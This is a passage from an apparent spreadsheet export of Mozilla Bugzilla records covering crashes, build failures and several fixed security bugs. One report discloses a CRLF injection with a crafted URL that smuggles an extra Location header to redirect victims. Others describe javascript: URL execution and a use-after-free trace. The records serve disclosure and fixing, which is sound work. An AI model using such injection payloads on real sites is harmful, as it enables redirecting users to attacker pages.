      </c>
      <c r="U1698" t="n">
        <v>0</v>
      </c>
      <c r="V1698" t="n">
        <v>23</v>
      </c>
      <c r="W1698" t="inlineStr">
        <is>
          <t>1. http://www.blogs.com/topten/top-10-country-music-blogs/
   This occurs on many many urls not just this one. This is my current top crasher in crash automation.
2. Assertion failure: false (compartment mismatched), at ../../../js/src/jscntxtinlines.h:227
Initially on Nightly this was a
###!!! ABORT: attempt to initialize OOP crash reporter before in-process crashreporter!: 'gExceptionHandler != NULL', file ../../../toolkit/crashreporter/nsExceptionHandler.cpp, line 2020
but after bug 773830 was fixed it settled down into the Assertion. It is just the assertion on Beta and Aurora.
ABORT: attempt to initialize OOP crash reporter before in-process crashreporter!: 'gExceptionHandler != NULL', file ../../../toolkit/crashreporter/nsExceptionHandler.cpp, line 2020
then Assertion failure: false (compartment mismatched), at ../../../js/src/jscntxtinlines.h:227
Also crashed Nightly, Aurora (may need to reload)
bp-a9cd5c2f-db62-4383-85c4-a08672120802
Firefox 17.0a1 Crash Report [@ js::types::TypeObject::addPropertyType ] 
bp-723b5531-d568-4856-9977-3ee742120802
Firefox 15.0a2 Crash Report [@ js::gc::PushMarkStack ] 
Found regression between 20120712015541-20120712174703
Pushlog: http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=70d92a6ccdfa&amp;tochange=6489be1890c0
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2012/07/2012-07-12-mozilla-central-debug/firefox-16.0a1.en-US.debug-linux-i686.tar.bz2
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2012/07/2012-07-13-mozilla-central-debug/firefox-16.0a1.en-US.debug-linux-i686.tar.bz2
Found regression between 20120715024321-20120716024822
Pushlog: http://hg.mozilla.org/releases/mozilla-aurora/pushloghtml?fromchange=50963e16d1dc&amp;tochange=d7602223c982
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2012/07/2012-07-15-mozilla-aurora-debug/firefox-15.0a2.en-US.debug-linux-i686.tar.bz2
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2012/07/2012-07-16-mozilla-aurora-debug/firefox-15.0a2.en-US.debug-linux-i686.tar.bz2
(didn't see the ABORT here)
Found regression between 20120718210721-20120719120951
Pushlog: http://hg.mozilla.org/releases/mozilla-beta/pushloghtml?fromchange=b2487714085b&amp;tochange=ebfad1bf8749
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2012/07/2012-07-19-mozilla-beta-debug/firefox-15.0.en-US.debug-linux-i686.tar.bz2
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2012/07/2012-07-20-mozilla-beta-debug/firefox-15.0.en-US.debug-linux-i686.tar.bz2
(didn't see ABORT here)</t>
        </is>
      </c>
      <c r="X1698" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1699">
      <c r="A1699" t="n">
        <v>1539598</v>
      </c>
      <c r="B1699" t="inlineStr">
        <is>
          <t>2019-03-27 12:06:46 -0700</t>
        </is>
      </c>
      <c r="C1699" t="inlineStr">
        <is>
          <t>Restrict mozAddonManager's special privileges to calls from the discovery pane</t>
        </is>
      </c>
      <c r="D1699" t="inlineStr">
        <is>
          <t>2019-07-10 11:09:48 -0700</t>
        </is>
      </c>
      <c r="E1699" t="n">
        <v>1</v>
      </c>
      <c r="F1699" t="n">
        <v>1</v>
      </c>
      <c r="G1699" t="n">
        <v>3</v>
      </c>
      <c r="H1699" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1699" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1699" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K1699" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1699" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1699" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1699" t="inlineStr">
        <is>
          <t>[adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q1699" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1699" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1699" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T1699" t="n">
        <v>1</v>
      </c>
      <c r="U1699" t="n">
        <v>0</v>
      </c>
      <c r="V1699" t="n">
        <v>24</v>
      </c>
      <c r="W1699" t="inlineStr">
        <is>
          <t>mozAddonManager has special powers above those of InstallTrigger to allow one-click installs/enables/disables of add-ons from the discovery pane. Since that functionality isn't meant to be used outside of the discovery pane, we should limit those privileges to usage in the discovery pane, when loaded in about:addons, rather than offering it to AMO in general.
We should also limit it to listed add-ons being installed from AMO, since the discovery pane will never offer unlisted add-ons.</t>
        </is>
      </c>
      <c r="X1699" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1700">
      <c r="A1700" t="n">
        <v>655389</v>
      </c>
      <c r="B1700" t="inlineStr">
        <is>
          <t>2011-05-06 15:19:25 -0700</t>
        </is>
      </c>
      <c r="C1700" t="inlineStr">
        <is>
          <t>CRLF Injection and the parsing of HTTP headers</t>
        </is>
      </c>
      <c r="D1700" t="inlineStr">
        <is>
          <t>2014-07-09 12:06:47 -0700</t>
        </is>
      </c>
      <c r="E1700" t="n">
        <v>1</v>
      </c>
      <c r="F1700" t="n">
        <v>1</v>
      </c>
      <c r="G1700" t="n">
        <v>3</v>
      </c>
      <c r="H1700" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1700" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1700" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1700" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L1700" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1700" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1700" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1700" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1700" t="inlineStr">
        <is>
          <t>[sg:moderate] [landed m-c 7/05] [nom'd by dveditz c#41][qa-]</t>
        </is>
      </c>
      <c r="Q1700" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1700" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1700" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T1700" t="n">
        <v>1</v>
      </c>
      <c r="U1700" t="n">
        <v>0</v>
      </c>
      <c r="V1700" t="n">
        <v>63</v>
      </c>
      <c r="W1700" t="inlineStr">
        <is>
          <t>My name is Ian Graham and I’m a Senior Security Engineer working with Citrix Online. Recently, we’ve been doing some research on CRLF injection (HTTP Response Splitting) attacks, and we found a behavior in Firefox that facilitates a specific type of attack. 
Consider a web application which is vulnerable to CRLF Injection via an external redirect. In other words, the application is configured to redirect requests for http://www.vulnerable.com/webmail/* to http://webmail.vulnerable.com/*, or something similar. Provided that the application is not correctly filtering CRLF characters, an attacker could create a malicious URI that, upon visiting, would redirect the victim to a website of his choice (in this case, the venerable badgerbadgerbadger.com).
For example, the request:
http://www.vulnerable.com/webmail/path%0d%0aLocation:%20http://www.badgerbadgerbadger.com
Will yield a response that looks something like:
HTTP/1.1 302 Found
Location: http://webmail.vulnerable.com/path
Location: http://www.badgerbadgerbadger.com
Content-Type: text/html
Content-Length: 156
Date: Thu, 05 May 2011 20:13:07 GMT
The URL has moved &lt;a href="http://webmail.vulnerable.com/path
Location: http://www.badgerbadgerbadger.com"&gt;here&lt;/a&gt;
And the client will automatically be redirected to http://www.badgerbadgerbadger.com. This is a pretty standard CRLF injection attack, but the interesting thing here is that it only works on Firefox (Tested on 4.0.1). I’ve tested with various versions of Chrome and IE, and they do not redirect the user to the malicious link. 
I’m not super familiar with the internals of Firefox, but I’m guessing that this is because Firefox parses headers in a slightly different way than IE or Chrome (i.e. in the case where there are multiple headers with the same name, IE/Chrome use the first header in the response, while Firefox apparently uses the last).
I don’t know if this particular behavior was intended, or if it’s just a side effect of Firefox’s implementation, and I’m not claiming that this is a Security Vulnerability per se. I just wanted to bring this behavior to the attention of the team, and point out that it facilitates a specific class of attacks.</t>
        </is>
      </c>
      <c r="X1700" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1701">
      <c r="A1701" t="n">
        <v>628034</v>
      </c>
      <c r="B1701" t="inlineStr">
        <is>
          <t>2011-01-22 11:34:34 -0800</t>
        </is>
      </c>
      <c r="C1701" t="inlineStr">
        <is>
          <t>[SECURITY] For not-logged-in users, the URL field doesn't safeguard against javascript: or data: URLs</t>
        </is>
      </c>
      <c r="D1701" t="inlineStr">
        <is>
          <t>2013-01-28 10:07:43 -0800</t>
        </is>
      </c>
      <c r="E1701" t="n">
        <v>1</v>
      </c>
      <c r="F1701" t="n">
        <v>1</v>
      </c>
      <c r="G1701" t="n">
        <v>4</v>
      </c>
      <c r="H1701" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1701" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1701" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K1701" t="inlineStr">
        <is>
          <t>3.6.3</t>
        </is>
      </c>
      <c r="L1701" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1701" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1701" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1701" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1701" t="inlineStr">
        <is>
          <t>[infrasec:input][ws:moderate][blocker will fix]</t>
        </is>
      </c>
      <c r="Q1701" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1701" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1701" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T1701" t="n">
        <v>1</v>
      </c>
      <c r="U1701" t="n">
        <v>0</v>
      </c>
      <c r="V1701" t="n">
        <v>31</v>
      </c>
      <c r="W1701" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Build Identifier: 
The javascript URI type can be used to execute javascript in a &lt;a&gt; tag.  Click on the supplied url above. 
Reproducible: Always</t>
        </is>
      </c>
      <c r="X1701" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1702">
      <c r="A1702" t="n">
        <v>133201</v>
      </c>
      <c r="B1702" t="inlineStr">
        <is>
          <t>2002-03-24 21:59:49 -0800</t>
        </is>
      </c>
      <c r="C1702" t="inlineStr">
        <is>
          <t>syntax error in show_bug.cgi</t>
        </is>
      </c>
      <c r="D1702" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E1702" t="n">
        <v>1</v>
      </c>
      <c r="F1702" t="n">
        <v>1</v>
      </c>
      <c r="G1702" t="n">
        <v>4</v>
      </c>
      <c r="H1702" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1702" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1702" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1702" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1702" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1702" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1702" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1702" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1702" t="inlineStr"/>
      <c r="Q1702" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1702" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1702" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1702" t="n">
        <v>1</v>
      </c>
      <c r="U1702" t="n">
        <v>0</v>
      </c>
      <c r="V1702" t="n">
        <v>3</v>
      </c>
      <c r="W1702" t="inlineStr">
        <is>
          <t>The templatised show_bug.cgi causes a syntax error in IE, due to quoting in
template/default/show/show_bug.html.tmpl (line 409)
-             onchange="if ((this.value != "[% bug.assigned_to_email %]") &amp;&amp;  
+             onchange="if ((this.value != '[% bug.assigned_to_email %]') &amp;&amp;</t>
        </is>
      </c>
      <c r="X1702" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1703">
      <c r="A1703" t="n">
        <v>1380297</v>
      </c>
      <c r="B1703" t="inlineStr">
        <is>
          <t>2017-07-12 05:20:12 -0700</t>
        </is>
      </c>
      <c r="C1703" t="inlineStr">
        <is>
          <t>Mac nightly repackage fails trying to read CodeName</t>
        </is>
      </c>
      <c r="D1703" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E1703" t="n">
        <v>1</v>
      </c>
      <c r="F1703" t="n">
        <v>1</v>
      </c>
      <c r="G1703" t="n">
        <v>5</v>
      </c>
      <c r="H1703" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1703" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1703" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1703" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1703" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1703" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1703" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1703" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1703" t="inlineStr"/>
      <c r="Q1703" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1703" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1703" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1703" t="n">
        <v>1</v>
      </c>
      <c r="U1703" t="n">
        <v>0</v>
      </c>
      <c r="V1703" t="n">
        <v>7</v>
      </c>
      <c r="W1703" t="inlineStr">
        <is>
          <t>https://tools.taskcluster.net/groups/UhB_B6lrQF-m2EpWpLB6nA/tasks/ZTsMZPDjRCyoJu6g8RXb8w/runs/0/logs/public%2Flogs%2Flive.log
It fails to find "CodeName" in application.ini https://dxr.mozilla.org/mozilla-central/rev/6fec4855b5345eb63fef57089e61829b88f5f4eb/python/mozbuild/mozbuild/repackaging/dmg.py#31
CodeName is set only if MOZ_APP_DISPLAYNAME is set:
https://dxr.mozilla.org/mozilla-central/rev/6fec4855b5345eb63fef57089e61829b88f5f4eb/build/application.ini.in#22-24
But it is not set/passed in some cases:
https://dxr.mozilla.org/mozilla-central/rev/6fec4855b5345eb63fef57089e61829b88f5f4eb/build/moz.build#61-62</t>
        </is>
      </c>
      <c r="X1703" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1704">
      <c r="A1704" t="n">
        <v>806031</v>
      </c>
      <c r="B1704" t="inlineStr">
        <is>
          <t>2012-10-26 18:45:08 -0700</t>
        </is>
      </c>
      <c r="C1704" t="inlineStr">
        <is>
          <t>[FIX] XBL.__proto__.toString is ugly and reveals address space layout</t>
        </is>
      </c>
      <c r="D1704" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:47 -0700</t>
        </is>
      </c>
      <c r="E1704" t="n">
        <v>1</v>
      </c>
      <c r="F1704" t="n">
        <v>1</v>
      </c>
      <c r="G1704" t="n">
        <v>3</v>
      </c>
      <c r="H1704" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1704" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1704" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K1704" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1704" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1704" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1704" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1704" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1704" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q1704" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1704" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1704" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T1704" t="n">
        <v>1</v>
      </c>
      <c r="U1704" t="n">
        <v>0</v>
      </c>
      <c r="V1704" t="n">
        <v>31</v>
      </c>
      <c r="W1704" t="inlineStr">
        <is>
          <t>Created attachment 675776
testcase
Got:
[object chrome://xbl-marquee/content/xbl-marquee.xml#marquee a646314]
Expected in opt, don't reveal address space info:
[object chrome://xbl-marquee/content/xbl-marquee.xml#marquee]
Expected in debug, format it properly:
[object chrome://xbl-marquee/content/xbl-marquee.xml#marquee @ 0x0a646314]
I can't find the code that's doing this.  But here's an example of code doing it right:
http://mxr.mozilla.org/mozilla-central/source/js/xpconnect/src/XPCWrappedNativeJSOps.cpp#74</t>
        </is>
      </c>
      <c r="X1704" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1705">
      <c r="A1705" t="n">
        <v>1062876</v>
      </c>
      <c r="B1705" t="inlineStr">
        <is>
          <t>2014-09-04 06:47:56 -0700</t>
        </is>
      </c>
      <c r="C1705" t="inlineStr">
        <is>
          <t>The "stop sharing" option in the video sharing control in the URL bar has no effect in iframes</t>
        </is>
      </c>
      <c r="D1705" t="inlineStr">
        <is>
          <t>2019-11-07 02:04:33 -0800</t>
        </is>
      </c>
      <c r="E1705" t="n">
        <v>1</v>
      </c>
      <c r="F1705" t="n">
        <v>1</v>
      </c>
      <c r="G1705" t="n">
        <v>3</v>
      </c>
      <c r="H1705" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1705" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1705" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K1705" t="inlineStr">
        <is>
          <t>32 Branch</t>
        </is>
      </c>
      <c r="L1705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1705" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1705" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1705" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q1705" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1705" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1705" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T1705" t="n">
        <v>1</v>
      </c>
      <c r="U1705" t="n">
        <v>0</v>
      </c>
      <c r="V1705" t="n">
        <v>31</v>
      </c>
      <c r="W1705" t="inlineStr">
        <is>
          <t>STR:
1. Go to http://jsfiddle.net/codepo8/agaRe/4/
2. Grant permission to share your camera
3. Once streaming begins, click the orange video sharing icon in the URL bar
4. Choose the "Stop Sharing" option from the popup in the sharing control box that appears
Notice that streaming continues.
There is no console output indicating an error state.
jesup suggests in IRC this may be because the video is in an iframe.</t>
        </is>
      </c>
      <c r="X1705" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1706">
      <c r="A1706" t="n">
        <v>608435</v>
      </c>
      <c r="B1706" t="inlineStr">
        <is>
          <t>2010-10-29 16:35:27 -0700</t>
        </is>
      </c>
      <c r="C1706" t="inlineStr">
        <is>
          <t>Featured page missing download sources</t>
        </is>
      </c>
      <c r="D1706" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E1706" t="n">
        <v>1</v>
      </c>
      <c r="F1706" t="n">
        <v>1</v>
      </c>
      <c r="G1706" t="n">
        <v>6</v>
      </c>
      <c r="H1706" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1706" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1706" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K1706" t="inlineStr">
        <is>
          <t>4.x</t>
        </is>
      </c>
      <c r="L1706" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1706" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1706" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1706" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1706" t="inlineStr"/>
      <c r="Q1706" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1706" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1706" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="T1706" t="n">
        <v>1</v>
      </c>
      <c r="U1706" t="n">
        <v>0</v>
      </c>
      <c r="V1706" t="n">
        <v>10</v>
      </c>
      <c r="W1706" t="inlineStr">
        <is>
          <t>https://addons.mozilla.org/en-US/firefox/featured
:(</t>
        </is>
      </c>
      <c r="X1706" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1707">
      <c r="A1707" t="n">
        <v>1591334</v>
      </c>
      <c r="B1707" t="inlineStr">
        <is>
          <t>2019-10-24 23:59:04 -0700</t>
        </is>
      </c>
      <c r="C1707" t="inlineStr">
        <is>
          <t>heap-use-after-free in SetOnstorage</t>
        </is>
      </c>
      <c r="D1707" t="inlineStr">
        <is>
          <t>2024-05-30 10:04:00 -0700</t>
        </is>
      </c>
      <c r="E1707" t="n">
        <v>1</v>
      </c>
      <c r="F1707" t="n">
        <v>1</v>
      </c>
      <c r="G1707" t="n">
        <v>3</v>
      </c>
      <c r="H1707" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1707" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1707" t="inlineStr">
        <is>
          <t>Privacy: Anti-Tracking</t>
        </is>
      </c>
      <c r="K1707" t="inlineStr">
        <is>
          <t>72 Branch</t>
        </is>
      </c>
      <c r="L1707" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1707" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1707" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1707" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1707" t="inlineStr">
        <is>
          <t>[adv-main71+][adv-esr68.3+]</t>
        </is>
      </c>
      <c r="Q1707" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1707" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1707" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T1707" t="n">
        <v>1</v>
      </c>
      <c r="U1707" t="n">
        <v>0</v>
      </c>
      <c r="V1707" t="n">
        <v>15</v>
      </c>
      <c r="W1707" t="inlineStr">
        <is>
          <t>This crash happens regularly while fuzzing an ASAN build of Firefox. It looks similar to https://bugzilla.mozilla.org/show_bug.cgi?id=1581084 , however it appears to have a different root cause.
```=================================================================
==7681==ERROR: AddressSanitizer: heap-use-after-free on address 0x61d0015973ab at pc 0x7fa664804962 bp 0x7ffe1f849af0 sp 0x7ffe1f849ae8
READ of size 1 at 0x61d0015973ab thread T0 (Web Content)
    #0 0x7fa664804961 in mozilla::EventListenerManager::SetEventHandlerInternal(nsAtom*, mozilla::TypedEventHandler const&amp;, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:751:30
    #1 0x7fa66480fc57 in mozilla::EventListenerManager::SetEventHandler(nsAtom*, mozilla::dom::EventHandlerNonNull*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1530:3
    #2 0x7fa66355e7dc in SetOnstorage /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventNameList.h:315:1
    #3 0x7fa66355e7dc in mozilla::dom::Window_Binding::set_onstorage(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindowInner*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:17747:24
    #4 0x7fa66407413d in bool mozilla::dom::binding_detail::GenericSetter&lt;mozilla::dom::binding_detail::MaybeCrossOriginObjectThisPolicy&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3146:8
    #5 0x7fa66abbef99 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458:13
    #6 0x7fa66abbef99 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:550:12
    #7 0x7fa66abc5161 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:619:10
    #8 0x7fa66abc5161 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:636:8
    #9 0x7fa66abc5161 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:774:10
    #10 0x7fa66b2ec273 in SetExistingProperty(JSContext*, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyResult&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2943:8
    #11 0x7fa66b2e50cd in bool js::NativeSetProperty&lt;(js::QualifiedBool)1&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2972:14
    #12 0x7fa66aef5597 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:283:10
    #13 0x7fa66aef5597 in js::ForwardingProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:149:10
    #14 0x7fa661560100 in nsOuterWindowProxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:944:23
    #15 0x7fa66aed3725 in setInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:395:19
    #16 0x7fa66aed3725 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:403:10
    #17 0x7fa66ab9db69 in SetProperty /builds/worker/workspace/build/src/js/src/vm/ObjectOperations-inl.h:280:12
    #18 0x7fa66ab9db69 in SetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:270:10
    #19 0x7fa66ab9db69 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2875:12
    #20 0x7fa66ab8997a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #21 0x7fa66abc598f in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:812:13
